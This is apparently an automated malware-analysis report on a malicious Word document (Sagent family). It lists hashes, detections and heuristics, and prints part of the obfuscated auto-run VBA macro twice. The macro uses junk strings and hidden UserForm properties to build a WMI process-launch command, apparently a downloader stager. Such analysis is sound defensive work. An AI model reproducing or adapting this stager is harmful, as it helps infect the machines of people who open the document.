Office (OLE) malware analysis — malicious · 038f9798da3df2c2

MALICIOUS

Office (OLE)

193.2 KB Created: 2020-08-19 21:31:00 Authoring application: Microsoft Office Word First seen: 2020-09-07

MD5: 221fed2c70cf3c2038b2065d5c01aae9 SHA-1: fe9f040297cddb624736245721d0ca099906f335 SHA-256: 038f9798da3df2c253620a2fd844e48c6d1a331e314d44196df45b0f9bedffde

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Document_Open macro and a hidden-property command stager, indicating malicious intent. The presence of a ClamAV detection for 'Doc.Malware.Sagent-9403571-0' further supports this. The VBA script's obfuscated nature and use of string concatenation for potentially malicious commands prevent a more detailed analysis of its specific actions, but the overall pattern suggests it's designed to download and execute further malware.

Heuristics 7

ClamAV: Doc.Malware.Sagent-9403571-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Sagent-9403571-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15341 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15341 bytes
SHA-256: `02acc1db2c4fa37db6fc1b6af6686e0f3a4431258401bb6e34f334fb12fc7357`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "A_gft0khts2" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub _ Document_open() Z9mr73gwc6ug8a.M_gscuvkdietfxvevz End Sub Attribute VB_Name = "Z9mr73gwc6ug8a" Attribute VB_Base = "0{EBC107FD-DB16-42DB-BA20-A81B22A24570}{AC968F29-200E-4CE1-B031-C421FEF98F74}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function M_gscuvkdietfxvevz() Tn83v37dzlbs877ka = "490" If Len("Vyv6zkj17htyfi1_Jwh_9yc1ugar") = Len("Q7r7x0i7yws68z") + 1 Then End If Len("Ag5391ty4z8_tefGjsuxgjv33kzSeb0rznnitydhzh201") < Len("Nsjwoe968iagp6zdv") Then MsgBox "Abq33a15rqsc65btgs" + "Nx6t5reinijtvx" MsgBox ("Xyl21i7vysm6ohe8y") MsgBox "Rbjgtwly4mvh" + "Xq_8oiq4hxbhasw1bj" End If If Len("Pn9vw2fzpbqtaPqpok1zinqph_s") = Len("S93diwu_6ogj") Then MsgBox "A23eb2pbhl2uyo_" + "Ep2yu1eyq36bqu" MsgBox ("Drfhxzkfjcc !!!") MsgBox "Pauviutz_pw0kxd" + "H8owxlxdsgn37jsv" End If Pvgwpf9dz6t4ngr4 = Z9mr73gwc6ug8a.HelpContextId + 50 + 50 Ihiqcukgbl3 = "758" If Len("S57f63b34dbri435vJ4dq29hlb2xt29g") = Len("Pqsbowdfiif3ik") + 1 Then End If Len("Lwr0_2jd09u1lfjneVhmmtg2z0is3qT0h9j0gxlnu") < Len("V74a07brndq") Then MsgBox "Bkik4bvgrq_" + "Ymdfeh7_4pm67" MsgBox ("Gx2_1ysd6_285j3oxo") MsgBox "Lcw38mghrly9oo640p" + "Sl56sdoioxho39" End If If Len("L7x66xurb3gbms0r50Rwwieyse4uk8") = Len("Zr0_gdv6g64clcb2pf") Then MsgBox "Lxkm5ytgmt3837" + "B7t_l1nks25f4" MsgBox ("Lnop7rk1eely8il !!!") MsgBox "Ybhb_ghp6ycm3v" + "N1v8gos7oam" End If U03so10k56k09a04 = ChrW(Pvgwpf9dz6t4ngr4 + (15)) W1r45cowf207m = "80" If Len("Joqvi47i_n1fMt49jhu7snetxnw") = Len("Fa2zhvjusfpox1") + 1 Then End If Len("Czq8dn4zy3mAlcwqk54n0qo8kiqdEj3ib5grtcold871i") < Len("Ku_e493fic_5") Then MsgBox "Jv7wcd4kip02" + "Kb6utgb_bu5cq5r7v" MsgBox ("Mz9b2hl4wp0g") MsgBox "Anbu2kzt53gl" + "Buwkloxksc6" End If If Len("Hyj1vxa6p5zpkP8vy822zf2gmeut6") = Len("Hhhqxp4iffrxi6") Then MsgBox "Au52z6fdwvss" + "Gsqlulohcl0s3p3" MsgBox ("Hc980mu24gxfew6 !!!") MsgBox "Xjay1fd8qa9j" + "G8qormtuwv891tozj" End If Us73fr0esajusj58d = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + U03so10k56k09a04 + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Z9mr73gwc6ug8a.Lvx1_0xpifn7q + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf" Dhk6mo8sk3ja = "629" If Len("N586grcb4bfbvdgzv3Miy6ouz7z1i37wud") = Len("Bjkbogmge42") + 1 Then End If Len("S51awt170slrvIukjqa_gxlrxecRj20v08s2kc6i") < Len("N04ra5386n2") Then MsgBox "Ogpu_pxtkjvt_" + "Lct_nf3ednygdi" MsgBox ("Uonhko1dhlxhz3k") MsgBox "Hrvo1n7_vtqdc" + "Vlp0s6hmza20my29cn" End If If Len("Zozt66ptow30walslSkqg93ux2bijyrdkd") = Len("C4udcm519ce9ag") Then MsgBox "Dmcn5r90heoke0" + "Wm96otjwhemi5" MsgBox ("N4ac6sea9jah5m !!!") MsgBox "Rbz2xh4ag37717irid" + "Rlnikqg6oy5hz8" End If Cihc5veidv3usj = Dsiiu606aot2n2c0j(Us73fr0esajusj58d) Hif19mrs13xk = "253" If Len("O_ahgzf56eryxzrlrSfg7vwgiwc_itgs9f") = Len("A7fu4mpezcly_hi89") + 1 Then End If Len("Pypob9dd6xvlRt ... (truncated)

SHA-256: 02acc1db2c4fa37db6fc1b6af6686e0f3a4431258401bb6e34f334fb12fc7357

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "A_gft0khts2"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Z9mr73gwc6ug8a.M_gscuvkdietfxvevz
End Sub


Attribute VB_Name = "Z9mr73gwc6ug8a"
Attribute VB_Base = "0{EBC107FD-DB16-42DB-BA20-A81B22A24570}{AC968F29-200E-4CE1-B031-C421FEF98F74}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function M_gscuvkdietfxvevz()
   Tn83v37dzlbs877ka = "490"
If Len("Vyv6zkj17htyfi1_Jwh_9yc1ugar") = Len("Q7r7x0i7yws68z") + 1 Then End
If Len("Ag5391ty4z8_tefGjsuxgjv33kzSeb0rznnitydhzh201") < Len("Nsjwoe968iagp6zdv") Then
        MsgBox "Abq33a15rqsc65btgs" + "Nx6t5reinijtvx"
        MsgBox ("Xyl21i7vysm6ohe8y")
        MsgBox "Rbjgtwly4mvh" + "Xq_8oiq4hxbhasw1bj"
End If
If Len("Pn9vw2fzpbqtaPqpok1zinqph_s") = Len("S93diwu_6ogj") Then
       MsgBox "A23eb2pbhl2uyo_" + "Ep2yu1eyq36bqu"
       MsgBox ("Drfhxzkfjcc !!!")
       MsgBox "Pauviutz_pw0kxd" + "H8owxlxdsgn37jsv"
End If

Pvgwpf9dz6t4ngr4 = Z9mr73gwc6ug8a.HelpContextId + 50 + 50
   Ihiqcukgbl3 = "758"
If Len("S57f63b34dbri435vJ4dq29hlb2xt29g") = Len("Pqsbowdfiif3ik") + 1 Then End
If Len("Lwr0_2jd09u1lfjneVhmmtg2z0is3qT0h9j0gxlnu") < Len("V74a07brndq") Then
        MsgBox "Bkik4bvgrq_" + "Ymdfeh7_4pm67"
        MsgBox ("Gx2_1ysd6_285j3oxo")
        MsgBox "Lcw38mghrly9oo640p" + "Sl56sdoioxho39"
End If
If Len("L7x66xurb3gbms0r50Rwwieyse4uk8") = Len("Zr0_gdv6g64clcb2pf") Then
       MsgBox "Lxkm5ytgmt3837" + "B7t_l1nks25f4"
       MsgBox ("Lnop7rk1eely8il !!!")
       MsgBox "Ybhb_ghp6ycm3v" + "N1v8gos7oam"
End If

U03so10k56k09a04 = ChrW(Pvgwpf9dz6t4ngr4 + (15))
   W1r45cowf207m = "80"
If Len("Joqvi47i_n1fMt49jhu7snetxnw") = Len("Fa2zhvjusfpox1") + 1 Then End
If Len("Czq8dn4zy3mAlcwqk54n0qo8kiqdEj3ib5grtcold871i") < Len("Ku_e493fic_5") Then
        MsgBox "Jv7wcd4kip02" + "Kb6utgb_bu5cq5r7v"
        MsgBox ("Mz9b2hl4wp0g")
        MsgBox "Anbu2kzt53gl" + "Buwkloxksc6"
End If
If Len("Hyj1vxa6p5zpkP8vy822zf2gmeut6") = Len("Hhhqxp4iffrxi6") Then
       MsgBox "Au52z6fdwvss" + "Gsqlulohcl0s3p3"
       MsgBox ("Hc980mu24gxfew6 !!!")
       MsgBox "Xjay1fd8qa9j" + "G8qormtuwv891tozj"
End If

Us73fr0esajusj58d = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + U03so10k56k09a04 + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Z9mr73gwc6ug8a.Lvx1_0xpifn7q + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
   Dhk6mo8sk3ja = "629"
If Len("N586grcb4bfbvdgzv3Miy6ouz7z1i37wud") = Len("Bjkbogmge42") + 1 Then End
If Len("S51awt170slrvIukjqa_gxlrxecRj20v08s2kc6i") < Len("N04ra5386n2") Then
        MsgBox "Ogpu_pxtkjvt_" + "Lct_nf3ednygdi"
        MsgBox ("Uonhko1dhlxhz3k")
        MsgBox "Hrvo1n7_vtqdc" + "Vlp0s6hmza20my29cn"
End If
If Len("Zozt66ptow30walslSkqg93ux2bijyrdkd") = Len("C4udcm519ce9ag") Then
       MsgBox "Dmcn5r90heoke0" + "Wm96otjwhemi5"
       MsgBox ("N4ac6sea9jah5m !!!")
       MsgBox "Rbz2xh4ag37717irid" + "Rlnikqg6oy5hz8"
End If

Cihc5veidv3usj = Dsiiu606aot2n2c0j(Us73fr0esajusj58d)
   Hif19mrs13xk = "253"
If Len("O_ahgzf56eryxzrlrSfg7vwgiwc_itgs9f") = Len("A7fu4mpezcly_hi89") + 1 Then End
If Len("Pypob9dd6xvlRt
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.